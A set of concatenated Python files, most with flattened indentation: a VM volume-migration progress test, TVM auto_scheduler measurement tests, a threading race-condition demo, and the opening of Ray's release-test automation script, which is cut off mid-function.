threads_result = [None] * threads_num
checker_threads = [None] * threads_num
checker_threads_result = [None] * threads_num
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
def migrate_volume(index):
target_host = test_lib.lib_find_random_host(vms[index].get_vm())
vms[index].stop()
sp_option = test_util.SnapshotOption()
sp_option.set_volume_uuid(vms[index].get_vm().allVolumes[0].uuid)
for i in range(0, 50):
sp_option.set_name("snapshot_for_migrate_progress_%s" % (i))
sp = vol_ops.create_snapshot(sp_option)
migrate_jobs[index] = str(uuid.uuid4()).replace('-', '')
print 'migrate job id: %s' % (migrate_jobs[index])
threads_result[index] = "Start"
vol_ops.migrate_volume_apiid(vms[index].get_vm().allVolumes[0].uuid, target_host.uuid, migrate_jobs[index])
threads_result[index] = "Done"
def check_migrate_volume_progress(index):
for i in range(0, 3600):
if migrate_jobs[index] is None:
time.sleep(0.1)
continue
print 'checking migrate job id: %s' % (migrate_jobs[index])
for i in range(0, 3600):
progresses = res_ops.get_progress(migrate_jobs[index])
if len(progresses) > 0:
break
time.sleep(0.1)
if len(progresses) <= 0:
test_util.test_fail("volume not start migrating in 360 seconds")
progress = progresses[0]
if int(progress.content) < 0 or int(progress.content) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.content))
for i in range(0, 3600):
last_progress = progress
progresses = res_ops.get_progress(migrate_jobs[index])
if len(progresses) <= 0:
break
progress = progresses[0]
if int(progress.content) < int(last_progress.content):
test_util.test_fail("Progress of task (%s) %s is smaller than last time %s" % (migrate_jobs[index], progress.content, last_progress.content))
time.sleep(0.1)
# vms[index].update()
# if vms[index].get_vm().allVolumes[0].status != 'Migrating':
# test_util.test_fail("Volume should be ready when no progress anymore")
vms[index].start()
checker_threads_result[index] = "Done"
def test():
global vms
for i in range(0, threads_num):
vms[i] = test_stub.create_vr_vm('migrate_stopped_vm', 'imageName_net', 'l3VlanNetwork2')
test_obj_dict.add_vm(vms[i])
ps = test_lib.lib_get_primary_storage_by_uuid(vms[i].get_vm().allVolumes[0].primaryStorageUuid)
if ps.type != inventory.LOCAL_STORAGE_TYPE:
test_util.test_skip('Skip test on non-localstorage')
for i in range(0, threads_num):
threads[i] = threading.Thread(target=migrate_volume, args=(i, ))
threads[i].start()
for i in range(0, threads_num):
checker_threads[i] = threading.Thread(target=check_migrate_volume_progress, args=(i, ))
checker_threads[i].start()
for i in range(0, threads_num):
checker_threads[i].join()
threads[i].join()
for i in range(0, threads_num):
if threads_result[i] != "Done":
test_util.test_fail("Exception happened during migrate Volume")
if checker_threads_result[i] != "Done":
test_util.test_fail("Exception happened during check migrate Volume progress")
for i in range(0, threads_num):
vms[i].destroy()
vms[i].expunge()
test_util.test_pass('Migrate Stopped VM progress Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vms
test_lib.lib_error_cleanup(test_obj_dict)
|
test_auto_scheduler_measure.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test measurement and log serialization. """
import json
import multiprocessing
import numpy as np
import tvm
from tvm import topi
from tvm import te, auto_scheduler
import tempfile
import tvm.testing
import pickle
from tvm.testing.auto_scheduler import matmul_auto_scheduler_test
from tvm.auto_scheduler import workload_registry
def record_common(dag, s):
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key="test", target=target)
inp = auto_scheduler.measure.MeasureInput(task, s)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
# Test in-memory record processing.
record_str = auto_scheduler.measure_record.dump_record_to_string(inp, res)
r_inp, r_res = auto_scheduler.measure_record.load_record_from_string(record_str)
# Only check the workload_key for simplification.
assert inp.task.workload_key == r_inp.task.workload_key
assert str(res) == str(r_res)
# Test file-based record processing.
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
s1 = dag.infer_bound_from_state(s)
s2 = dag.infer_bound_from_state(inputs[0].state)
assert s1 == s2
assert not (s1 == dag.get_init_state())
def test_record_split_reorder_fuse_annotation():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Split
its0 = s.split(C, s[C].iters[0], [4, 8, 8])
its1 = s.split(C, s[C].iters[4], [8, 4, 4])
# Reorder
s.reorder(
C, [its0[0], its1[0], its0[1], its1[1], its0[2], its1[2], its0[3], s[C].iters[8], its1[3]]
)
# Fuse
s.fuse(C, [s[C].iters[0], s[C].iters[1], s[C].iters[2]])
# Parallel
s.parallel(C, s[C].iters[0])
# Thread bind(The blockIdx & threadIdx are used in GPU, just for record testing here)
s.bind(C, s[C].iters[1], "blockIdx.x")
s.bind(C, s[C].iters[2], "threadIdx.z")
s.bind(C, s[C].iters[3], "vthread")
# Unroll
s.unroll(C, s[C].iters[4])
# Vectorize
s.vectorize(C, s[C].iters[6])
record_common(dag, s)
def test_record_compute_at_root_inline_cache_read_write():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
AA = topi.nn.relu(A)
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(AA[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Cache Write
C_shared = s.cache_write(C, "shared")
# Compute At
s.compute_at(C_shared, C, s[C].iters[0])
# Cache Read
B_global = s.cache_read(B, "global", [C_shared])
s.compute_at(B_global, C_shared, s[C_shared].iters[2])
# Compute Inline
s.compute_inline(AA)
# Compute Root
s.compute_root(C_shared)
record_common(dag, s)
def test_record_follow_split_follow_fused_split():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
dag = auto_scheduler.ComputeDAG([A, B, E])
s = dag.get_init_state()
# Follow Split
s.split(C, s[C].iters[0], [4, 2, 8, 4], True)
split_step0 = len(s.transform_steps) - 1
s.follow_split(C, s[C].iters[5], split_step0, 4)
# Follow Fused Split
its0 = s.split(E, s[E].iters[0], [4, 2, 8, 4], True)
split_step1 = len(s.transform_steps) - 1
its1 = s.split(E, s[E].iters[5], [2, 4, 2, 4], True)
split_step2 = len(s.transform_steps) - 1
its = []
for i0, i1 in zip(its0, its1):
its.append(i0)
its.append(i1)
for i in range(0, 5):
s.fuse(E, [s[E].iters[i], s[E].iters[i + 1]])
s.follow_fused_split(D, s[D].iters[0], [split_step1, split_step2], 2, True)
record_common(dag, s)
def test_record_pragma_storage_align_rfactor():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
dag = auto_scheduler.ComputeDAG([A, B, C])
s = dag.get_init_state()
# Rfactor
ko, _ = s.split(C, s[C].iters[2], [16])
s.rfactor(C, ko, 2)
# Pragma
s.pragma(C, s[C].iters[0], "auto_unroll_max_step$64")
# StorageAlign
s.storage_align(C, s[C].iters[-1], 8, 4)
record_common(dag, s)
def test_recover_measure_input():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(correct_inp.task.compute_dag) == str(inp.task.compute_dag)
correct_inp = auto_scheduler.measure.recover_measure_input(raw_inp, rebuild_state=True)
assert str(correct_inp.state) == str(inp.state)
def test_workload_dis_factor():
calc = auto_scheduler.utils.calc_workload_dis_factor
decode = auto_scheduler.utils.decode_workload_key
# Identical
target_wkl_key = json.dumps(
["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"]
)
assert calc(decode(target_wkl_key), decode(target_wkl_key)) == 1
# Compatible with a factor
wkl_key = json.dumps(["func1", [1, 3, 112, 112], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == 8 * 2 * 2
# Incompatible argument with zeros
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [1, 1], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [0, 0], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible non-integer argument
wkl_key = json.dumps(["func1", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "int8"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible function
wkl_key = json.dumps(["func2", [8, 3, 224, 224], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
# Incompatible due to non-dividable factor
wkl_key = json.dumps(["func1", [8, 3, 223, 223], [32, 3, 3, 3], [0, 0], [1, 1], "float32"])
assert calc(decode(target_wkl_key), decode(wkl_key)) == float("inf")
def test_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_dag_measure_local_builder_runner():
if not tvm.testing.device_enabled("llvm"):
return
A = te.placeholder((512, 512), name="A")
B = te.placeholder((512, 512), name="B")
k = te.reduce_axis((0, 512), name="k")
C = te.compute((512, 512), lambda i, j: te.sum(A[i][k] * B[k][j], axis=[k]), name="C")
D = topi.nn.relu(C)
E = topi.nn.relu(D)
tensors = [A, B, E]
dag = auto_scheduler.ComputeDAG(tensors)
key = workload_registry.register_workload_tensors(dag.workload_key(), tensors)
transfer_data = workload_registry.serialize_workload_registry_entry(key)
f_data = pickle.dumps(transfer_data)
f_new = pickle.loads(f_data)
del workload_registry.WORKLOAD_FUNC_REGISTRY[key]
workload_registry.deserialize_workload_registry_entry(f_new)
target = tvm.target.Target("llvm")
task = auto_scheduler.SearchTask(compute_dag=dag, workload_key=key, target=target)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
def test_workload_serialization():
key = tvm.auto_scheduler.utils.get_func_name(matmul_auto_scheduler_test)
transfer_data = workload_registry.serialize_workload_registry_entry(key)
f_data = pickle.dumps(transfer_data)
f_new = pickle.loads(f_data)
del workload_registry.WORKLOAD_FUNC_REGISTRY[key]
workload_registry.deserialize_workload_registry_entry(f_new)
def test_measure_local_builder_rpc_runner():
if not tvm.testing.device_enabled("llvm"):
return
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
del measure_ctx
def measure_local_builder_rpc_runner_spawn():
assert multiprocessing.get_start_method(False) == "spawn"
test_measure_local_builder_rpc_runner()
@tvm.testing.requires_llvm
def test_measure_local_builder_rpc_runner_spawn():
ctx = multiprocessing.get_context("spawn")
p = ctx.Process(target=measure_local_builder_rpc_runner_spawn)
p.start()
p.join()
@tvm.testing.requires_llvm
def test_measure_target_host():
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target=tvm.target.Target("llvm", "llvm -mtriple=aarch64-linux-gnu"),
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
with tempfile.NamedTemporaryFile() as fp:
auto_scheduler.save_records(fp.name, [inp], [res])
log_reader = auto_scheduler.RecordReader(fp.name)
inputs, _ = log_reader.read_lines()
assert len(inputs) == 1
raw_inp = inputs[0]
recovered_inp = auto_scheduler.measure.recover_measure_input(raw_inp)
assert str(recovered_inp.task.target.host) == str(inp.task.target.host)
@tvm.testing.requires_llvm
def test_measure_special_inputs_map_by_name_local_runner():
@auto_scheduler.register_workload
def foo():
X = te.placeholder(shape=[10], dtype="int32")
Index = te.placeholder(shape=[1], dtype="int32", name="Index")
Y = te.compute((1,), lambda i: X[Index[i]])
return [X, Index, Y]
# This workload cannot use random input for the `Index` input
task = auto_scheduler.SearchTask(
func=foo,
target="llvm",
task_inputs={
"Index": tvm.nd.array(np.array([5], dtype="int32")),
},
)
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
local_runner = auto_scheduler.LocalRunner(timeout=10)
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = local_runner.run([minp], bress)
assert mress[0].error_no == 0
@tvm.testing.requires_llvm
def test_measure_special_inputs_map_by_name_rpc_runner():
@auto_scheduler.register_workload
def foo():
X = te.placeholder(shape=[10], dtype="int32")
Index = te.placeholder(shape=[1], dtype="int32", name="Index")
Y = te.compute((1,), lambda i: X[Index[i]])
return [X, Index, Y]
# This workload cannot use random input for the `Index` input
task = auto_scheduler.SearchTask(
func=foo,
target="llvm",
task_inputs={
"Index": tvm.nd.array(np.array([5], dtype="int32")),
},
)
for enable_cpu_cache_flush in [True, False]:
minp = auto_scheduler.MeasureInput(task, task.compute_dag.init_state)
local_builder = auto_scheduler.LocalBuilder()
measure_ctx = auto_scheduler.LocalRPCMeasureContext(
timeout=60, enable_cpu_cache_flush=enable_cpu_cache_flush
)
rpc_runner = measure_ctx.runner
bress = local_builder.build([minp])
assert bress[0].error_no == 0
mress = rpc_runner.run([minp], bress)
assert mress[0].error_no == 0
if __name__ == "__main__":
tvm.testing.main()
|
ShareVariable.py
|
import time, threading
balance = 0
def change_id(n):
    global balance
    # Read-modify-write on a shared global; without a lock this update is
    # not atomic, so concurrent threads may interleave and lose updates.
    balance = balance + n
    # balance = balance - n
def run_thread(n):
for i in range(10):
change_id(i)
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
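# --- Editor's sketch: the same update made thread-safe with a Lock ---
# Serializing the read-modify-write on `balance` makes the final value
# deterministic regardless of how the threads interleave.
lock = threading.Lock()
def change_id_safe(n):
    global balance
    with lock:
        balance = balance + n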
|
e2e.py
|
"""
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built once.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
Make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off by adding the --kick-off-only
parameter to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specifies the maximum time in seconds that can pass without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currently not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
"""Return environment variable with default value"""
# If the environment variable is set but "", still return default
return os.environ.get(key, None) or default
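# Example (editor's addition): unlike a plain os.environ.get, a variable
# that is set but empty still falls back to the default:
#   os.environ["MY_VAR"] = ""
#   getenv_default("MY_VAR", "fallback")  # -> "fallback"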
GLOBAL_CONFIG = {
"ANYSCALE_USER": getenv_default("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": getenv_default(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # anyscale_default_cloud
"ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
"RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": getenv_default("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": getenv_default(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"RELEASE_RESULTS_DIR": getenv_default("RELEASE_RESULTS_DIR",
"/tmp/ray_release_test_artifacts"),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
"REPORT_RESULT": getenv_default("REPORT_RESULT", ""),
}
REPORT_S = 30
RETRY_MULTIPLIER = 2
def exponential_backoff_retry(f, retry_exceptions, initial_retry_delay_s,
max_retries):
retry_cnt = 0
retry_delay_s = initial_retry_delay_s
while True:
try:
return f()
except retry_exceptions as e:
retry_cnt += 1
if retry_cnt > max_retries:
raise
logger.info(f"Retry function call failed due to {e} "
f"in {retry_delay_s} seconds...")
time.sleep(retry_delay_s)
retry_delay_s *= RETRY_MULTIPLIER
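# Usage sketch (editor's addition, not part of the release tooling):
# retry a flaky callable up to 3 times, starting at a 1 second delay and
# doubling after each failure. `_flaky_call` is a hypothetical stand-in
# for e.g. an AWS API request.
#
#   attempts = {"n": 0}
#   def _flaky_call():
#       attempts["n"] += 1
#       if attempts["n"] < 3:
#           raise ConnectionError("transient failure")
#       return "ok"
#
#   exponential_backoff_retry(
#       _flaky_call, retry_exceptions=(ConnectionError,),
#       initial_retry_delay_s=1, max_retries=3)  # -> "ok"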
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
logger.info(
"Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
pass
class ReleaseTestTimeoutError(RuntimeError):
pass
class SessionTimeoutError(ReleaseTestTimeoutError):
pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
pass
class CommandTimeoutError(ReleaseTestTimeoutError):
pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
pass
# e.g., App config failure.
class AppConfigBuildFailure(RuntimeError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def commit_or_url(commit_or_url: str) -> str:
if commit_or_url.startswith("http"):
# Directly return the S3 url
if "s3" in commit_or_url and "amazonaws.com" in commit_or_url:
return commit_or_url
# Resolve the redirects for buildkite artifacts
# This is needed because otherwise pip won't recognize the file name.
if "buildkite.com" in commit_or_url and "artifacts" in commit_or_url:
return requests.head(commit_or_url, allow_redirects=True).url
# Else, assume commit
os.environ["RAY_COMMIT"] = commit_or_url
return wheel_url(GLOBAL_CONFIG["RAY_VERSION"], GLOBAL_CONFIG["RAY_BRANCH"],
commit_or_url)
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
os.environ["RAY_COMMIT"] = commit
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def populate_wheels_sanity_check(commit: Optional[str] = None):
if not commit:
cmd = ("python -c 'import ray; print("
"\"No commit sanity check available, but this is the "
"Ray wheel commit:\", ray.__commit__)'")
else:
cmd = (f"python -c 'import ray; "
f"assert ray.__commit__ == \"{commit}\", ray.__commit__'")
os.environ["RAY_WHEELS_SANITY_CHECK"] = cmd
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
